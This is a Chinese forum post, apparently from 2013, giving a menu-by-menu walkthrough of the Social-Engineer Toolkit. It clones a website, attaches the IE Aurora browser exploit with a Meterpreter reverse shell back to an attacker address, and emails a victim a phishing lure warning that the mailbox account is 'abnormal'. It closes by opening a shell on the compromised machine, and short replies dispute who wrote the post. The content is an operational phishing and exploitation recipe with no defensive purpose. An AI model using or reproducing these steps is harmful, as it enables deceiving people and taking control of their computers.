[光棍节征文]一客户端的web攻击(主要针对ODAY的IE浏览器)
利用set社会工程包发动对IE浏览器的攻击:root@btR3#cd /pentest/exploits/set(进入set工具包目录)
root@btR3#./set(编译set工具包)
set#1 (选择社会工程学攻击)
set#2 (选择web攻击向量)
set#2 (选择metasploitIE浏览器攻击)
set#2 (选择站点克隆)
set#yes (选择是否使用NAT端口转换,如在内网选择YES)
set#192.168.0.71 (输入SET攻击者服务器)
set#yes (选择是否加载端口到反弹SHELL中,选择是)
set#192.168.0.71 (输入反弹SEHLL地址)
set#http://www.backlion.com (选择克隆的网页地址)
set#24 (选择IE AURORA渗透模块)
set#2 (选择meterpteter反弹式攻击负载)
set#回车 (回车使用433端口)
set#1 (选择单独发送邮箱攻击)
set#895098355@qq.com (攻击的邮箱)
set#1 (选择使用GOOGLE邮箱)
set#backlion@gmail.com (输入你的google邮箱)
set#输入你的邮箱密码
set#选择YES (是不是高优先标签,选择YES)
set#EMAIL subject:你的邮箱账号存在异常,请修改 (EMAIL的标
题)
set#H (发送文件以什么格式,默认选择H)
set#输入发送信息内容“请点击连接地址进行修改!
:http://192.168.0.175″ 按CRT+C结束,然后回车确认!
msf exploit(ms10_002-aurora)>background
msf exploit(handler)> sessios -i 1
shellmeterpreter>shell 楼主也太没节操了已经声明不能转载了 Free_小东 发表于 2013-11-12 21:47 static/image/common/back.gif
楼主也太没节操了已经声明不能转载了
这不是我的原创是谁的,我亲自写的!还有假吗? Free_小东 发表于 2013-11-12 21:47 static/image/common/back.gif
楼主也太没节操了已经声明不能转载了
这不是我的原创是谁的,我亲自写的!还有假吗? backlion 发表于 2013-11-13 00:30 static/image/common/back.gif
这不是我的原创是谁的,我亲自写的!还有假吗?
刚刚在法克看到了可是基友你这没图啊
页:
[1]